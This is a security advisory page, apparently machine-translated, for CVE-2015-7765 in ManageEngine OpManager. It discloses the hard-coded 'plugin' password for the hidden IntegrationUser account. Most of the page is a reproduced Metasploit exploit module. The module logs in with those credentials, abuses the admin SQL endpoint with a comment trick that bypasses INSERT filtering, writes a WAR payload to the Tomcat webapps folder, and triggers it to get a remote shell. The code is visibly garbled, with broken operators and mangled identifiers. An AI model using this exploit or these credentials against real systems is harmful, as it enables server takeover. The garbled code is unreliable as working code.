ZOHO ManageEngine OpManager hard-coded credential Vulnerability (CVE-2015-7765)

ZOHO ManageEngine OpManager hard-coded credential Vulnerability (CVE-2015-7765)
ZOHO ManageEngine OpManager hard-coded credential Vulnerability (CVE-2015-7765)

Release date:
Updated on:

Affected Systems:

zoho ManageEngine OpManager <= 11.5 build 11600

Description:

CVE (CAN) ID: CVE-2015-7765

ZOHO ManageEngine OpManager is a network performance management software.

ZOHO ManageEngine OpManager 11.5 build 11600 and earlier versions use a hard-coded password "plugin" for the IntegrationUser account. authenticated remote users can exploit this vulnerability to obtain administrator access permissions.

<* Source: xistence (xistence@0x90.nl)

Link: http://seclists.org/fulldisclosure/2015/Sep/66
*>

Test method:

Alert

The following procedures (methods) may be offensive and are intended only for security research and teaching. Users are at your own risk!

##
# This module requires Metasploit: http://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

Require 'msf/core'

Class Metasploit3 <Msf: Exploit: Remote
# It removes large object in database, shoudn't be a problem, but just in case ....
Rank = ManualRanking

Include Msf: Exploit: Remote: HttpClient
Include Msf: Exploit: FileDropper

Def initialize (info = {})
Super (update_info (info,
'Name' => 'manageengine OpManager Remote Code Execution ',
'Description' => % q {
This module exploits a default credential vulnerability in ManageEngine OpManager, where
Default hidden account "IntegrationUser" with administrator privileges exists. The account
Has a default password of "plugin" which can not be reset through the user interface.
Log-in and abusing the default administrator's SQL query functionality, it's possible
Write a WAR payload to disk and trigger an automatic deployment of this payload. This
Module has been tested successfully on OpManager v11.5 and v11.6 for Windows.
},
'License '=> MSF_LICENSE,
'Author' =>
[
'Xistence <xistence [at] 0x90. nl> '# Discovery, Metasploit module
],
'References '=>
[
['Edb', '123'],
],
'Platform' => ['java'],
'Arch '=> ARCH_JAVA,
'Targets' =>
[
['Manageengine OpManager v11.6 ', {}]
],
'Privileged' => false,
'Disclosuredate' => 'sep 14 2015 ',
'Defaulttarget' => 0 ))
End

Def uri
Target_uri.path
End

Def check
# Check version
Vprint_status ("# {peer}-Trying to detect ManageEngine OpManager ")

Res = send_request_cgi ({
'Method' => 'get ',
'Uris '=> normalize_uri (uri, 'loginpage. do ')
})

Unless res & res. code = 200
Return Exploit: CheckCode: Safe
End

If res. body = ~ /OpManager. * v \. ([0-9] + \. [0-9] +) <\/span>/
Version = $1
If Gem: Version. new (version) <= Gem: Version. new ('11. 6 ')
Return Exploit: CheckCode: Appears
Else
# Patch unknown
Return Exploit: CheckCode: Detected
End
Elsif res. body = ~ /OpManager/
Return Exploit: CheckCode: Detected
Else
Return Exploit: CheckCode: Safe
End
End

Def SQL _query (key, query)
Res = send_request_cgi ({
'Method' => 'post ',
'Uri' => normalize_uri (uri, 'api ', 'json', 'admin', 'submitquery '),
'Vars _ get' =>{ 'apikey' => key },
'Vars _ Post' => {'query' => query}
})

Unless res & res. code = 200
Fail_with (Failure: Unknown, "# {peer}-Query was not succesful! ")
End

Res
End

Def exploit
Print_status ("# {peer}-Access login page ")
Res = send_request_cgi ({
'Method' => 'post ',
'Uris '=> normalize_uri (uri, 'jsps', 'login. do '),
'Vars _ Post' => {
'Domainname' => 'null ',
'Authtype' => 'localuserlogin ',
'Username' => 'integrationuser', # Hidden user
'Password' => 'plugin' # password of hidden user
}
})

If res & res. code = 302
Redirect = URI (res. headers ['location']). to_s.gsub (/#\//,"")
Print_status ("# {peer}-Location is [# {redirect}]")
Else
Fail_with (Failure: Unknown, "# {peer}-Access to login page failed! ")
End


# Follow redirection process
Print_status ("# {peer}-Following redirection ")
Res = send_request_cgi ({
'Url' => redirect,
'Method' => 'get'
})

If res & res. code = 200 & res. body = ~ /Window. OPM. apiKey = "([a-z0-9] + )"/
Api_key = $1
Print_status ("# {peer}-Retrieved API key [# {api_key}]")
Else
Fail_with (Failure: Unknown, "# {peer}-Redirect failed! ")
End

App_base = rand_text_alphanumeric (4 + rand (32-4 ))
War_payload = payload. encoded_war ({: app_name => app_base}). to_s
War_payload_base64 = Rex: Text. encode_base64 (war_payload). gsub (/\ n /,'')

Print_status ("# {peer}-Executing SQL queries ")

# Remove large object in database, just in case it exists from previous exploit attempts
SQL = 'select lo_unlink (-1 )'
SQL _query (api_key, SQL)

# Create large object "-1". We use "-1" so we will not accidently overwrite large objects in use by other tasks.
SQL = 'select lo_create (-1 )'
Result = SQL _query (api_key, SQL)
If result. body = ~ /Lo_create ":( [0-9] + )}/
Lo_id = $1
Else
Fail_with (Failure: Unknown, "# {peer}-ipvs Large Object ID not found! ")
End

# Insert WAR payload into the pg_largeobject table. We have to use/**/to bypass OpManager 'sa checks for INSERT/UPDATE/DELETE, etc.
SQL = "INSERT/**/INTO pg_largeobject (loid, pageno, data) VALUES (# {lo_id}, 0, DECODE ('# {war_payload_base64}', 'base64 '))"
SQL _query (api_key, SQL)

# Export our large object id data into a WAR file
SQL = "SELECT lo_export (# {lo_id}, '../.. // tomcat // webapps // # {app_base}. war ');"
SQL _query (api_key, SQL)

# Remove our large object in the database
SQL = 'select lo_unlink (-1 )'
SQL _query (api_key, SQL)

Register_file_for_cleanup ("tomcat // webapps // # {app_base}. war ")
Register_file_for_cleanup ("tomcat // webapps // # {app_base }")

10. times do
Select (nil, 2)

# Now make a request to trigger the newly deployed war
Print_status ("# {peer}-Attempting to launch payload in deployed WAR ...")
Res = send_request_cgi (
{
'Uri '=> normalize_uri (target_uri.path, app_base, "# {Rex: Text. rand_text_alpha (rand (8) + 8)}. jsp "),
'Method' => 'get'
})
# Failure. The request timed out or the server went away.
Break if res. nil?
# Success! Triggered the payload, shocould have a shell incoming
Break if res. code = 200
End

End

End

Suggestion:

Vendor patch:

Zoho
----
The vendor has released a patch to fix this security problem. Please download it from the vendor's homepage:

Https://support.zoho.com/portal/manageengine/helpcenter/articles/pgsql-submitquery-do-vulnerability

This article permanently updates the link address: